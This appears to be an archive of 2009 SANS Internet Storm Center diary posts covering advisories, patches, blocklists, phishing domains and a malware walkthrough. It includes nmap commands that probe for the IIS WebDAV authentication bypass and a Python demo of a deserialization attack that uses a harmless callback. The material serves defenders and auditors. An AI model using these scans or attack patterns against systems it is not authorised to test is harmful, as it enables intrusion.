Published: 2009-05-31

L0phtcrack is Back!

Many thanks to Rob V. for providing the update that L0phtCrack is back in full force!  I have personally used LC4 and LC5 for quite some time, and am looking forward to the presentation features of LC6.  LC is back in the "hands of the original authors from the L0pht who are giving it the care and feeding it deserves," which gives pen testers and auditors more great things to look forward to in the near future.


Published: 2009-05-30

Embedded Devices: An Avenue for Cyberterrorism?

There has been growing concern about the security of embedded devices as they continue to proliferate across several industries. The concern stems from a confluence of issues that together make for a difficult problem to solve.

First, these devices increasingly rely on commodity operating systems (which carry with them commodity vulnerabilities and exploits).  Second, there is a great deal of restriction on what consumers of these devices can do with them.  Very often, you simply can’t touch the operating system at all.  Last, these devices tend to be notoriously difficult to update, usually requiring the vendor to ship a CD to “reflash” the device. Updates are few and far between, if they happen at all.

The result is that these devices are subject to a good subset of the same vulnerabilities as any workstation, but it is very difficult to put them in the same patch rotation, much less maintain and harden them.  Ideally, these devices shouldn’t be plugged into a network, but often they are.  For instance, many embedded devices for SCADA and healthcare have reportedly been infected by Conficker (among others).

In those cases, they just got infected with commodity malware and behaved like your typical infected host. The scary part of this is, these devices can control very important things. Years ago, I would chafe at anyone using the word “cyberterrorism”. Terrorism has a specific definition that is a bit more restrictive than “something bad”.  It’s not terrorism unless widespread debilitating fear is involved.

However, now with embedded devices in hospitals, you have devices vulnerable to commodity exploits, where the payload can be modified to abuse the device's functionality.  In health care, for instance, if the device controls some “life-saving” or “life-sustaining” function, malware could have it intentionally cause harm.  That would be an example of cyberterrorism.  People would very quickly develop a fear of health care.  So what can we do about it?

The real solution is that embedded device manufacturers need to make these devices updateable and ship them hardened. Barring that, here are some tips to help protect facilities that use these devices.

1)    If they don’t need to be on a network, take a Cat5 cable, cut off the RJ45 adapter and about an inch of cable and plug that into the port.  Not only does this fill the gap, it makes people think twice before “just plugging it in”.  Hang a note off the cable, if necessary.
2)    If these devices have a unique vendor for the network card, use network access control to simply block all the MAC addresses for that vendor.  For instance, MAC address AA:AA:AA:22:22:22 has a vendor portion of AA:AA:AA and the unique host portion is 22:22:22.  So block AA:AA:AA:*.
3)    If they absolutely must be networked, create an “islanded” network: in short, a network with no external-facing components, a totally isolated LAN.
4)    Limit all access to the device via network, via USB or via Bluetooth.  All these can be used as infection mechanisms.
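The OUI-based blocking in tip 2 is simple to script if your NAC can consume a list of denied MACs. A minimal sketch (the AA:AA:AA vendor prefix is the hypothetical example from above, not a real device vendor):

```python
def oui(mac):
    """Return the vendor (OUI) portion of a MAC address, normalized."""
    return mac.upper().replace("-", ":")[:8]

def is_banned(mac, banned_ouis):
    """True if the MAC's vendor prefix is on the block list."""
    return oui(mac) in banned_ouis

# Hypothetical vendor prefix, per the AA:AA:AA example in tip 2
BANNED = {"AA:AA:AA"}

print(is_banned("aa:aa:aa:22:22:22", BANNED))  # True  (vendor portion matches)
print(is_banned("00:1B:44:11:3A:B7", BANNED))  # False (different vendor)
```

Keep in mind MAC addresses are trivially spoofed, so treat this as a tripwire for accidental plug-ins, not a security boundary.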

What are your thoughts? Those of you using embedded devices or vendor “black boxes”, how are you securing them?

John Bambenek
bambenek /at/ gmail.com


Published: 2009-05-29

It's summer... Do you know what your kids are doing?

School is over, or about to be over, for many kids.  In many families the parents work, and the kids will be left at home to relax and enjoy their summer vacation.  This means a lot of free time and an internet out there just waiting to be explored.  Everyone is aware of the need to keep your kids safe while on the internet.  But in some cases, there is a need to keep the internet and others safe from your kids.  Let me explain that last comment.  Kids with too much time on their hands get into trouble.  You hear about it all the time on the news: kids getting into trouble with things such as vandalism, stealing, etc.  What about kids getting into trouble on the internet?

Do a Google search on the phrase "teenage hacker" and see what comes up.  Kids are curious and learn fast.  The internet can become a playground for them to explore and test out cool new programs and tools they find online or write themselves.  Chat rooms are available where kids can learn many things from others and want to try them for themselves.  They can also get pulled into the "wrong crowd" on the internet and get in way over their heads fast.  They may not even see anything wrong with it; it's just computers, after all.

Most of the filtering technology today focuses on web traffic: what are your kids looking at on the web?  That is a good thing, but there are many other ports and protocols available and nothing watching them.  Would you know if your child was running a botnet?  Stealing credit card numbers?  Hacking into websites?  It's not a game, and there are real consequences, even when the intent may have been to do good. Here are some recent examples:

"Nineteen-year-old Dmitriy Guzner from New Jersey was part of an underground hacking group named 'Anonymous' that targeted the church with several attacks. He could face ten years in prison on computer hacking charges and is due to be sentenced on August 24."  http://www.securecomputing.net.au/News/144850,teenage-hacker-pleads-guilty-to-church-of-scientology-cyber-attacks.aspx

"Twitter has announced a review into four worm attacks on the site as a teenage hacker admits he could be jailed for his role in the stunt."  http://news.sky.com/skynews/Home/Technology/Twitter-Worm-Attack-Biz-Stone-Announces-Review-As-Teenage-Hacker-Michael-Mooney-Speaks-Out/Article/200904215261579

"A teenage hacker whose campaign to expose holes in Internet security sparked an FBI investigation was being sentenced in court today."  http://www.independent.co.uk/news/business/news/teenage-hacker-to-be-sentenced-for-internet-crusade-676871.html


As parents, we also need to talk to our kids about the other dangers that are on the internet.  Dangers such as hacking, virus making, botnet creation, stealing, etc.  You may think your child is doing nothing but sitting on a computer playing.  But keep in mind that a computer on the internet is a portal to a whole 'nother world.


Published: 2009-05-29

VMware Patches Released

Patches were released yesterday to fix a DoS vulnerability and a potential arbitrary code execution issue.  Here are the two vulnerabilities:

1.  VMware Descheduled Time Accounting driver:

The issue affects the VMware Descheduled Time Accounting driver and can cause a denial of service in Windows-based virtual machines on the vulnerable versions.  This driver is an optional (non-default) part of the VMware Tools installation.  Virtual machines migrated from vulnerable releases remain vulnerable if their tools are not upgraded and the following three conditions exist:

- The virtual machine is running a Windows operating system.

- The VMware Descheduled Time Accounting driver is installed
in the virtual machine.

- The VMware Descheduled Time Accounting Service is not running
in the virtual machine.

2.  libpng package for the ESX 2.5.5 Service Console

The libpng package is used for creating and manipulating PNG (Portable Network Graphics) image files.  A crafted PNG file loaded by an application linked against libpng could cause the application to crash or could allow arbitrary code execution with the privileges of the user running the application.

Another flaw addresses PNG images that contain "unknown" chunks.  If an application linked against libpng attempted to process a malformed, unknown chunk in a malicious PNG image, it could cause the application to crash.




Published: 2009-05-29

Blackberry Server Vulnerability

For all of you running around with a BlackBerry, be careful opening .pdf files.  A vulnerability announced on Tuesday allows a specially crafted .pdf file, when opened on your BlackBerry, to potentially "cause memory corruption and possibly lead to arbitrary code execution on the computer that hosts the BlackBerry Attachment Service."  If you have not done so, please make sure your servers are patched. The versions affected are:

  • BlackBerry® Enterprise Server software version 4.1 Service Pack 3 (4.1.3) through 5.0
  • BlackBerry® Professional Software 4.1 Service Pack 4 (4.1.4)

If anyone has received, or receives, a malicious .pdf, please send us a copy.


Published: 2009-05-28

Microsoft DirectShow vulnerability

Microsoft have recently announced a DirectShow vulnerability via an advisory and multiple blog entries.

The advisory indicates that Microsoft are investigating public reports of a vulnerability within the DirectShow element of DirectX; CVE-2009-1537 has been allocated to this vulnerability.

Microsoft have published quite a detailed set of actions which provide a temporary workaround for this issue to prevent the download of a crafted QuickTime-formatted file.

In the advisory Microsoft have indicated that a patch will be produced, but give no timescales. To reduce the potential risk, you should weigh the impact of applying the workaround against the period of no protection while its MAPP/MSRA partners get definitions out for detection, etc.

SecurityFocus have reported that targeted exploits of this issue have been seen in the wild.



Published: 2009-05-28

Stego in TCP retransmissions

I just started reading an interesting new paper out of the Warsaw University of Technology entitled Hiding Information in Retransmission.  It got me thinking: even those of us who have extensive monitoring of our networks will rarely have the capability to compare retransmitted packets to the originals to detect this.  A really interesting idea.  The abstract can be found here and the paper itself here.
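The detection idea itself is simple in principle: remember a digest of the payload for each (stream, sequence number) pair and flag any retransmission whose payload differs from the first copy seen. A toy sketch of that idea (the packet tuples here are simplified stand-ins, not real TCP parsing):

```python
import hashlib

def find_modified_retransmissions(packets):
    """packets: iterable of (stream_id, seq, payload) tuples.

    Remember a digest of the first payload seen for each (stream, seq)
    and flag any later copy whose payload differs -- a possible covert
    channel hidden in a retransmission."""
    first_seen = {}
    suspicious = []
    for stream, seq, payload in packets:
        key = (stream, seq)
        digest = hashlib.sha256(payload).hexdigest()
        if key not in first_seen:
            first_seen[key] = digest
        elif first_seen[key] != digest:
            suspicious.append(key)
    return suspicious

# Two copies of seq 1 differ by one byte: flagged. Seq 2 matches: clean.
pkts = [("10.0.0.1:4433", 1, b"GET / HTTP/1.1"),
        ("10.0.0.1:4433", 1, b"GET / HTTPX1.1"),   # "retransmission"
        ("10.0.0.1:4433", 2, b"Host: example"),
        ("10.0.0.1:4433", 2, b"Host: example")]
print(find_modified_retransmissions(pkts))  # [('10.0.0.1:4433', 1)]
```

The hard part in practice is exactly what the diary notes: you need full-payload capture and state for every outstanding segment, which very few monitoring setups keep.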


Published: 2009-05-28

More new volatility plugins

If you follow our diary at all, by now you know I am a big fan of Volatility for doing analysis of memory images.  I use it quite a bit in my automated malware analysis environment.*  Well, our friend Michael Hale Ligh, who brought us the excellent malfind plugin, has released another great one: the usermode_hook plugin.  Read his writeup; it is well worth the time.


*Shameless plug: Come to SANSFIRE in Baltimore next month and meet many of the handlers, I'll be talking about my automated environment including how I currently use volatility and some of what I still want to do with it.


Published: 2009-05-27

WebDAV write-up

SusanB wrote in today to tell us that a really good write-up on understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV vulnerability by Steve Friedl of unixwiz.net is available here.
It was written because Steve and some others at unixwiz.net found Microsoft’s "guidance confusing for users who were not IIS experts".  It includes a very good flowchart that should assist anyone who is confused, detailed descriptions of WebDAV, remediation ideas, and links to other WebDAV references.


Published: 2009-05-27

Host file black lists

Henry Hertz Hobbit, who maintains a black list of "bad hosts," wrote in today with some host file links
and comments on them. I have included most of his comments with very little editing
(I removed a few names and comments about other list maintainers and corrected a bit of the grammar).
I have NOT verified all of the lists that Henry discusses below. Our users should be warned that
I have seen poorly maintained lists block legitimate sites in the past.
We have had some less attentive or overly aggressive list maintainers use our hosts
list, http://isc.sans.org/ipsascii.html, as a block list even though it clearly states "DO NOT USE AS A BLOCK LIST,"
and then blame isc.sans.org for the listing.
Other handlers have written some excellent diaries about blocklists addressing issues
such as Spam blocking by RBLs, Blocklists and politics,
and making the right choice in black list selection:

For more information on host-based blocking, this site has good descriptions,
some of the lists that are in Henry’s set, and some additional lists he didn’t include.

From Henry Hertz Hobbit:
"Two old venerable lists are MVPHosts and hpHosts.

MalwareDomainList is here with their lists and they block ONLY sites with malicious
content (no ads or trackers / spies):

The French connection consists of what I would call the MVPHosts file with a Français twist
(there are some trackers that are quite prevalent in France that don't exist any place else):

Another site has the most comprehensive lists, though they may need some pruning:

This list primarily doesn't belong on the desktop but in something like this:

And then there is my list which includes many of the hosts that MalwareDomainList lists.

But I provide something far more powerful called a PAC (Proxy Auto Configuration) filter
that blocks unknown threats:

Now, I have heard you need an IQ of 130 or higher to use the PAC filter.
If that is a problem, so be it.  But consider the following points.

1. hpHosts (hosts-file.net) blocks approximately 3700 typo hosts. 
I block them with just two hosts in the hosts file (ownbox.com and www.ownbox.com)
and these two rules in the PAC filter:

BadNetworks[i++] = ",";
BadNetworks[i++] = ",";

Now that cuts it down to size, doesn't it?  There are a lot of other power reducers and
falling-through-the-cracks rules in there!  Otherwise my file would be almost as large
as the list at rlwpx.free.fr/WPFF/hosts.htm.

2. If you enable the PAC filter on Windows in IE you will have your eyes opened.
I had full debug on that way once and found the PAC filter was even working at the level
of telling me I sent a print-out to the network printer!  But debug really should only
be used in Firefox with debug mode set to debugNormal.  Do not turn debug on in Opera or
Safari (they kill it), or IE (you will have pop-up nightmares).

3. The REGEXPs are precompiled for speed.  It is faster in debug mode than John LoVerso's
original was without any debug.  But then I noticed some of his ad patterns are pretty convoluted. 
But if you have to interpret them every time ...

4. I notice patterns that occur frequently enough that I block yet to be discovered
hosts with patterns like these:
BadHostParts[i++] = "antispy";  // VOTRE CHOIX
BadHostParts[i++] = "antivir";  // VOTRE CHOIX

There are of course some white-list rules to counteract the bad rules
(and now you are back to blocking in the hosts file):
GoodDomains[i++] = "antispamfilterblocker.com";
GoodDomains[i++] = "antivirusyellowpages.com";
GoodDomains[i++] = "pcantivirusreviews.com";

5.  Even if a host makes it past the rules and there is no host block,
some of the malware follows URL patterns, and I block those as I discover them,
mentally count them, and consider whether the count is high enough to go into panic mode
(and I think a lot of people are already there now):

BadURL_Parts[i++] = "av2008";
BadURL_Parts[i++] = "av2009";
BadURL_Parts[i++] = "sms.exe";
BadURL_Parts[i++] = "smsreader";

Oh yes, HostsMan is available here:
http://www.abelhadigital.com/ "
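Henry's PAC-filter approach (substring rules for bad host parts, counteracted by a whitelist of good domains) is easy to model outside JavaScript. This Python sketch only mirrors the handful of rules quoted above, and the first test hostname is made up:

```python
# Rules transcribed from Henry's examples above; the test hostname is made up.
BAD_HOST_PARTS = ["antispy", "antivir"]
GOOD_DOMAINS = ["antispamfilterblocker.com",
                "antivirusyellowpages.com",
                "pcantivirusreviews.com"]

def is_blocked(host):
    """Block any host containing a bad substring, unless the domain is
    explicitly whitelisted (the white-list rules counteract the bad rules)."""
    host = host.lower()
    if any(host == d or host.endswith("." + d) for d in GOOD_DOMAINS):
        return False
    return any(part in host for part in BAD_HOST_PARTS)

print(is_blocked("free-antivir-scan.example.com"))  # True  (matches "antivir")
print(is_blocked("pcantivirusreviews.com"))         # False (whitelisted)
print(is_blocked("www.pcantivirusreviews.com"))     # False (whitelisted subdomain)
```

This is exactly why pattern rules need the whitelist: "pcantivirusreviews.com" contains "antivir" and would otherwise be blocked as collateral damage.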

UPDATE: Steven, another blocklist maintainer, pointed out this article he wrote about blocklists, host files and PAC files.



Published: 2009-05-26

Vista & Win2K8 SP2 available

Microsoft Windows Vista and Windows Server 2008 Service Pack 2 are now officially available for download (32-bit and 64-bit). Given the recent trojaned copies of MS software on BitTorrent, we suggest everyone download directly from Microsoft's site. If you are in no hurry to get this, it will be automatically downloaded and installed for you by Windows Update within a few weeks.


Jason Lam  http://www.twitter.com/jasonlam_sec


Published: 2009-05-26

A new Web application security blog

If you have any interest in Web application security, you might want to check out this new SANS Web Application Security blog. Lots of information related to web app sec is provided.


The contributors of this blog are ISC handlers (Johannes Ullrich and Jason Lam) and various other SANS instructors.


Published: 2009-05-25

NTPD autokey vulnerability

US-CERT published VU#853097 the other day detailing an exploitable buffer overflow in ntpd's implementation of the autokey feature.  The folks at ntp.org have released version 4.2.4p7 to correct it; download here.  The announcement can be seen here.


Published: 2009-05-25

Wireshark-1.0.8 released

Speaking of Wireshark, a new version was released last week which fixes a vulnerability in the PCNFSD dissector.



Announcement: http://www.wireshark.org/news/20090521.html

Advisory:  http://www.wireshark.org/security/wnpa-sec-2009-03.html

Release notes:  http://www.wireshark.org/docs/relnotes/wireshark-1.0.8.html

Download:  http://www.wireshark.org/download.html


Published: 2009-05-25

More tools for (US) Memorial Day

For those of you (in the US anyway) enjoying a day off and BBQ-ing, here is another cool new tool I came across earlier today over on Malware Forge, called nPeID.  Like my packerid.py, it uses Ero Carrera's pefile package.  I'll be checking it out later this afternoon.


Published: 2009-05-24

Facebook phishing using Belgium (.be) domains

This is not new or exciting, but as we have received several reports during the weekend (thanks to all who wrote in - Kevin, Mike, Rick), you all should know what is going on. It seems a new Facebook phishing/spam/"worm" campaign is doing the rounds. It uses Belgian (.be) domains to impersonate the Facebook login page and steal user credentials.

Some of the malicious domains being used are redfriend dot be, redbuddy dot be, picoband dot be... (at this point, none of them can be resolved).

It's recommended to filter access to all of them (and the others to come)!

Raul Siles


Published: 2009-05-24

Analyzing malicious PDF documents

As we announced in a recent ISC diary, Adobe is changing its patching model and strategy, but it seems JavaScript will still be enabled by default in Adobe Acrobat and Reader. As a consequence, I foresee more PDF vulnerabilities, exploits and attacks in the near future (let's hope I'm wrong).

On the one hand, I've been actively using PDF exploits in recent penetration tests, emulating the real-world attacks we have seen in the wild and described in several ISC diaries during the last 2-3 years (you can get most of them using the following search in Google: "pdf site:isc.sans.org"). Both the open-source Metasploit Framework and commercial pen-testing tools, like Core Impact, include these capabilities.

On the other hand, we need to be able to dissect these malicious files when we are the target.  The Hakin9 magazine has made available this week (for free) a great introductory article on the internal format of PDF files and how to analyze malicious PDF documents, particularly those exploiting a vulnerability in the embedded JavaScript interpreter (very common), by Didier Stevens (a well-known PDF expert we've mentioned regarding previous PDF vulnerabilities):

"Anatomy of Malicious PDF Documents". Didier Stevens. Hakin9 magazine.

In order to get a copy of the article, in PDF format (What a coincidence! Is it malicious or not?), you just need to provide an e-mail address. Do not forget to download the RTF document with the code listing (link on the right-hand side).

This article is a must-read and a great starting point for incident handlers interested in increasing their skills at analyzing malicious PDF documents. If you want to start practicing today, before becoming a target, generate a malicious PDF document in Metasploit and analyze it. For more advanced inspection, I encourage you to use some specific PDF analysis tools.

Raul Siles


Published: 2009-05-24

IIS admins, help finding WebDAV remotely using nmap

If you are concerned about the recent IIS 6.0 WebDAV remote auth bypass vulnerability, you will be interested in detecting whether you are running WebDAV and whether you are vulnerable. You can do that locally or remotely. I can identify scenarios where both methods are useful to audit internal or external web servers.

For local testing, please follow Adrien's diary from a couple of days ago.

For remote testing you can use our good friend nmap and a new NSE script (http-iis-webdav-vuln) by Ron Bowes. I've been using it on a recent penetration test, but it can equally be used in your vulnerability assessments and pre-incident handling tasks, following two easy steps:

  • Download/Update & compile nmap from the SVN repository:
$ svn co --username guest --password "" svn://svn.insecure.org/nmap/
$ cd nmap
$ ./configure
$ make
$ sudo make install
  • Run the script just against your IIS web servers (specify the web server port accordingly, "-p" option):
$ nmap -n -PN -p80 --script=http-iis-webdav-vuln <target_web_server.domain.com>
  • The script doesn't work directly against HTTPS web servers. Therefore, you need to make use of nmap's service detection capabilities ("-sV") to make it work:
$ nmap -n -PN -sV -p443 --script=http-iis-webdav-vuln <target_web_server.domain.com>


This NSE script launches a kind of dictionary attack, searching for potential web server folders. If you want to avoid it, because you just want to test an existing specific folder or subfolder, use the "--script-args=webdavfolder=<PATH>" option to specify it (all in one line):

$ nmap -n -PN -p80 --script=http-iis-webdav-vuln 
  --script-args=webdavfolder="protected/webdav/folder/" <target_web_server.domain.com>

This is a listing of the most common output you can get:

  • WebDAV is disabled on a HTTP server:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is DISABLED. Server is not currently vulnerable.

  • WebDAV is disabled on a HTTPS server:
443/tcp open  ssl/http Microsoft IIS webserver 6.0
|_ http-iis-webdav-vuln: WebDAV is DISABLED. Server is not currently vulnerable.
Service Info: OS: Windows

  • WebDAV is enabled on a HTTP server, but no folder was found:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. No protected folder found; check not run. 
If you know a protected folder, add --script-args=webdavfolder=<path>

  • WebDAV is enabled on a HTTP server, but the specified folder is not vulnerable:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Could not determine vulnerability of folder: 

  • WebDAV is enabled on a HTTP server, and vulnerable folders were found:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /secret, /webdav


Please, audit ALL your web servers before anybody else does! ... and don't forget to look at your web server logs to check if someone is already testing it!

Raul Siles


Published: 2009-05-22

Patching and Apple - Java issue

At the other end of the spectrum is Apple.  There is a Java issue (CVE-2008-5353) which was reported to Sun and fixed by Sun back in December.  For some reason the fix was not included in the recent security updates all Mac users would have received.  Why not?

Actually, that's what we asked, but the response was a tad disappointing and not at all enlightening.  In the meantime, Mac users are vulnerable to a simple drive-by exploit.  The POC code was posted on Milw0rm a couple of days ago.  You can read more on the issue here and here.  The page at the first link has a link which will execute the /usr/bin/say command using a Java applet; it demonstrates the issue nicely.

It won't be long before it is being used in live exploits.  Apple, please fix it, soon.  In the meantime, people, disable Java.


Brian Krebs wrote about this issue as well; you can read it here.  The main story doesn't really say anything new, but he has done some additional analysis and mapped the lag between Sun fixing a Java issue and Apple releasing the corresponding update, which is interesting.  You can find that here.


Mark H 



Published: 2009-05-22

Patching and Adobe

We all remember the beating Adobe received back in February regarding the JBIG2 issue.  The patch was very slow in coming, and basically the response was, well, pretty pathetic.

Now, as any incident handler knows, one of the most important steps in the incident handling process is lessons learned.  So it was very refreshing to see Adobe follow this principle and learn from the incident.  In the last few days they have announced what they are doing, which you can read here and here.

They'll do a quarterly patch cycle and fit it in with the second Tuesday of the month.  Based on the response earlier in May, it looks like their new processes are working so far.  We'll have to see how it pans out throughout the year.

Mark H - Shearwater






Published: 2009-05-21

IIS admins, help finding WebDAV

Microsoft have pointed to one of their KB articles to help admins in an enterprise locate IIS boxes with WebDAV enabled. It is located here. There is also a blog post here with some FAQs on WebDAV. This is particularly useful if you are concerned about the IIS 6.0 WebDAV remote auth bypass on internal systems.

Adrien de Beaupré
Intru-shun.ca Inc.



Published: 2009-05-21

Gumblar analysis and writeup

Andrew has performed a client-side analysis and writeup of the recent Gumblar malware attacks. It can be found here.

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-05-20

Speling and Grammur Opshunall

Wanted: Person of low moral character to correct spelling/grammar mistakes on phishing postings. Must be motivated, self starter. Computer knowledge, criminal background, and personal hygiene skills preferred but not required.

Ok, I say this a lot, but this time I mean it waaaaay more than usual.  DO NOT EVEN THINK OF FOLLOWING ANY LINK YOU MAY COME ACROSS IN ANY SEARCH RELATED TO THIS STORY.  Bad, bad things will happen to you.

Capitalizing on the burgeoning desire on the part of every red-blooded male to see the U.S. President's main squeeze in the buff, some enterprising malware knotheads have been seeding various comment boards out there with links to "photos" of the First Ta-Ta's.

A little Googling on the phrases "As I've understood it was made by papara**i" and "will *issapear from internet tonight" (note, I'm not including the full quotes here, because I don't want to muddy the search engine waters...) will bring up a list of sites with links on their comment pages.  Big sites.  Sites that should know better.

What happens if you follow a link?  Well, that particular ride has a height restriction, and no matter how tall you think you are, you're not tall enough. DON'T DO IT.  REALLY.

The results of a visit will be documented in a future Follow The Bouncing Malware, but suffice to say, it's some pretty interesting stuff...

The links these guys are using change by the hour (but their pitch doesn't), so it should be pretty easy to kill these things.

And maybe I'm some sort of old skool fascist, but do you really need to allow live links on comment pages?


Published: 2009-05-20

CiscoWorks TFTP Directory Traversal Vulnerability

Cisco has announced that a directory traversal flaw has been discovered in its CiscoWorks product line.  According to the announcement:

Products that have TFTP services enabled and that run CiscoWorks
Common Services versions 3.0.x, 3.1.x, and 3.2.x are vulnerable.
Only CiscoWorks Common Services systems running on Microsoft Windows
operating systems are affected.

A successful exploitation of this vulnerability may allow an attacker
unauthorized access to view or modify application and host operating
system files. Modification of some system files could result in a denial
of service condition.

More information and a complete list of vulnerable products is available from:



Published: 2009-05-20

Cyber Warfare and Kylin thoughts

I believe that most of our readers heard about the Kylin OS.

This is supposed to be the super Chinese operating system, designed to be US-proof... in other words, an OS that would make US cyber-warfare tactics useless. More here in the Post article.

My personal opinion is that there is a huge amount of hype around this.
First, Kylin is available for download (Kylin 2.1.1a at kylin.org.cn), and if this is the one being used by China as their secure OS, or better yet, as US-cyber-warfare-bullet-proof, then there may be some problems...

The OS kernel is nothing more than our well-known FreeBSD, with Linux binary compatibility.
Second, secure OSs are not something new; remember that SELinux was also funded by the NSA.
Third, a Chinese OS shouldn't be the US's main concern in cyber warfare... (more on this at the end of this diary).

Cyber warfare is definitely a broad topic. In a simple view, we can think of it as a way to reach a state or the state's critical infrastructure. It may include network penetration, DDoS, remote sabotage of critical infrastructure and "more".
Also, remember that there is no longer a range or defined battlespace.

If we think of fourth-generation warfare, it is even more complex, since it is not a formal war like Iran vs. Iraq anymore... now it is more like Israel vs. Hamas, or pro-Palestine groups vs. NATO, or even the PCA (Pakistan Cyber Army) vs. the HMG (Hindu Militant Group)...

Now, back to the Kylin story... do you really believe that we should be worried about a Chinese OS when our military and government networks are vulnerable to worms that exploit PATCHED vulnerabilities and open shares?

My talk at SANSFire in Baltimore is called "Malwares, Money and Criminal/Terror Activity. The Dangerous Relationship", where I will cover some of these Cyber Warfare topics and more. If you plan to come, it will be on June 17th.

Pedro Bueno - pbueno && isc // .sans // .org


Published: 2009-05-20

Breakfast: Java, Serial, and an Apple

According to Julien Tinnes in the CR0 Blog, it appears that Apple's recent security update failed to fix a Java flaw that was reported to Sun back in August 2008 and patched by Sun way back in December 2008.  The upshot: according to the blog (and I've yet to be able to independently confirm it), any browser on OSX that uses the Apple-supplied version of Java is vulnerable to remote exploitation via a class of flaws known as Java deserialization vulnerabilities.

Deserialization is the process of retrieving stored data that an application previously "persisted."  Deserialization attacks take advantage of the fact that the deserialization process trusts that the data being pulled from storage is correctly formatted -- i.e., that it contains only the types of data expected.
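The flaw here is in Java, but the misplaced trust is generic to deserializers. As an illustration only (Python's pickle rather than Java serialization; the class and function names are made up), here is how serialized bytes can direct the deserializer to invoke a callable of the attacker's choosing:

```python
import pickle

calls = []

def record(msg):
    """Stand-in for 'arbitrary code' -- benign here, but it could be anything."""
    calls.append(msg)

class Innocent:
    """The type the application expects to read back from storage."""
    def __init__(self, value):
        self.value = value

class Evil:
    """Attacker-controlled: __reduce__ tells the deserializer what to call."""
    def __reduce__(self):
        return (record, ("attacker code ran",))

safe_blob = pickle.dumps(Innocent(42))   # what the app thinks it persisted
evil_blob = pickle.dumps(Evil())         # what the attacker substitutes

pickle.loads(safe_blob)                  # harmless
pickle.loads(evil_blob)                  # invokes record() during deserialization
print(calls)                             # ['attacker code ran']
```

The application never asked to run record(); merely deserializing attacker-supplied bytes was enough, which is why untrusted input should never reach a trusting deserializer.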

It's all rather complicated, but suffice to say, both Firefox and Safari appear to be exploitable, so until we hear something definitive from Apple on the subject, we would recommend running with Java disabled in your browser on OSX.

Speaking of hearing something definitive from AAPL, I'll be happy to print whatever they send us in an update to this diary.

Tom Liston - InGuardians, Inc.
ISC - Handler On Duty


Published: 2009-05-20

Web Toolz

Ok, a couple of web app testing tools have been recently updated/released:

  • My buddies Kevin Johnson, Justin Searle, and the rest of the SamuraiWTF dev team have released version 0.6 of the SamuraiWTF live web testing framework CD.  From the announcement:

"The SamuraiWTF project team is proud to announce the immediate release of
SamuraiWTF 0.6.  This release is available at http://samurai.inguardians.com.

We have updated and fixed a number of issues with the environment as
well as improved performance of the java based tools.  We have also included
a virtual machine of the environment.  This VM requires VMWare.

If there are any questions, please either send them to samurai@inguardians.com
or join the developers mailing list on sourceforge.net."

  • httpsScanner, a Java program that scans a web server to test the strength of its SSL connections, has been released in version 1.1.  You can get a copy here.


Published: 2009-05-20

Follow the Bouncing Malware: Gone With the WINS - Part II

Imagine, if you will, that you're the newest contestant on the latest reality-tv show, Idle American Apprentice to the Dancing Bachelorette Stars.  Like all good reality shows (now there's an oxymoron...), you have the opportunity to "earn" your way to be safe from elimination (you know, that time of the evening when the grumpy, scowling dude with the bad comb-over says "You're Fired"®), if you can manage to "win" some sort of utterly contrived daily "challenge."

And, oh, what a challenge it is! 

You're teamed up with a partner, who is blindfolded, given a cell phone, and driven to your home.  After being spun around a few dozen times to mess with their sense of direction (and really, who doesn't like seeing dizzy, stressed-out people in blindfolds stumbling around in unfamiliar surroundings? Heck, that's how the missus and I spend many a Friday evening... uh... um... nevermind...) they're placed in some random room of your home.  Using only the cell phone, you need to be the first contestant to somehow direct them to find the kitchen and make your pouty-lipped, rail-thin bachelorette a peanut-butter 'n' jelly sammich.

So, what do you do?

Obviously, before anyone will be slappin' Smuckers and Skippy on bread, there's going to need to be a whole lot o'back-and-forth on the phone-- first, as you try to figure out where they are, and then as you try to tell them how to get where they need to be.  Remember, they can't see because they're blindfolded, so you'll need to rely on all of their other senses.  You might start by asking them whether there is carpet on the floor, whether they hear the ticking of a clock... you might ask them to slowly walk around the room and to tell you what the furniture they find in the room feels like, etc... etc... The idea is, you have to start by trying to somehow figure out their location.  Once you know where they are, then you can start giving them some broad direction: "First, face the couch... then turn left. Walk forward until you get to the wall, and then move along it to your left until you find the door. Go out through the door and turn left..."  Then, as you navigate them into the kitchen, you'll get increasingly specific: "open the third cupboard door to the left of the stove, the peanut butter is on the second shelf..."

The overall "flow" in the challenge can be summed up by a series of "big" questions, roughly corresponding to: "Where am I?", "Where is the kitchen?", and "Where is the stuff I need to make lil' Miss Skinny a sammich?"  Answering each of these requires that you've successfully answered each of the questions that preceded it.

This is a fairly useful analogy to the situation in which the malware that we've been looking at has found itself.  Having exploited one of the WINS vulnerabilities patched in MS04-045, the malware is being executed in some pretty unfamiliar territory.  Like your partner in the challenge, it's not in a totally alien landscape: houses are houses... but knowing things about houses in general won't get you navigating around a specific house.  So it is for our chunk o' malware: it's missing all of the niceties that the operating system normally provides.  To understand why this is so, it's necessary for you to understand a little about how Windows programs actually work.

While there are literally millions of vastly different Windows programs available, in many ways, just like "a house is a house", a "program is a program."  On one level, they do many different things... on another level, they do many of the same things:  they display windows on the screen, they access information from the filesystem, the peripherals, and the network, they have clickable buttons, edit fields, drop down menus, scroll-bars, tabs, etc...  If each program on your system had to individually drag along all of the code necessary to do all of those things, then even the most trivial program would rapidly turn into a steaming, multi-megabyte pile of bloat-- i.e. your standard VisualBasic or Delphi app ;-)

To make life easier for programmers and consistent for users (hey, imagine if EVERY application had its own "unique" user interface... ouch, that's gonna leave a mark...) much of the normal, day-to-day "stuff" that programs do has been rolled into shared code libraries ("Dynamic Link Libraries" or DLLs in Windows).  When a Windows program is built, all of the requests for the "stuff" found in the shared code libraries are relegated to a set of "jumping off points" called the "Import Table."  For example, if I write a program that displays a "Do you really want to delete this file?" message box (followed, no doubt, by a "Do you really, REALLY want to delete this file" request) the dialog box is displayed using the system function MessageBoxA().  When my program is compiled, every MessageBoxA() function call that I make in my application, actually goes to that "jumping off point" (which, up until the program loads, doesn't "jump off" to anything...)  When my program executes, the Windows Loader looks at the import table, and loads any of the shared DLL libraries that my program needs into its memory space.  It then runs down through the list of imported functions that my program is using, and fixes up those "jumping off points" so that they point to the correct place within the DLL code in my program's memory space.

